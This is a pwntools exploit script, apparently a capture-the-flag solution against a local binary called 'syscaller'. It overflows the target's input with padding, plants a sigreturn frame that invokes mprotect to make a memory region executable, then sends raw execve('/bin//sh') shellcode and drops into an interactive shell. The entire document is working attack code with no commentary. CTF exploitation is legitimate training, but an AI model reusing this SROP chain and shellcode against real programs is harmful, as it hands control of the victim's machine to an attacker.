from pwn import *

p = process("./syscaller")
'''
p = gdb.debug("./syscaller", gdbscript = 

)
'''
context.arch = "amd64"
frame = SigreturnFrame()
frame.rip = 0x400104
frame.rax = 0x0a
frame.rdi = 0x400000
frame.rsi = 0x1000
frame.rdx = 0x7
frame.rsp = 0x40011A

payload = (b"A" * 8) * 3 + p64(0x0f) + (b"A" * 8) * 4
payload += bytes(frame)
p.sendafter(b"perish.\n", payload)

shellcode = b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05"
p.send(shellcode)

p.interactive()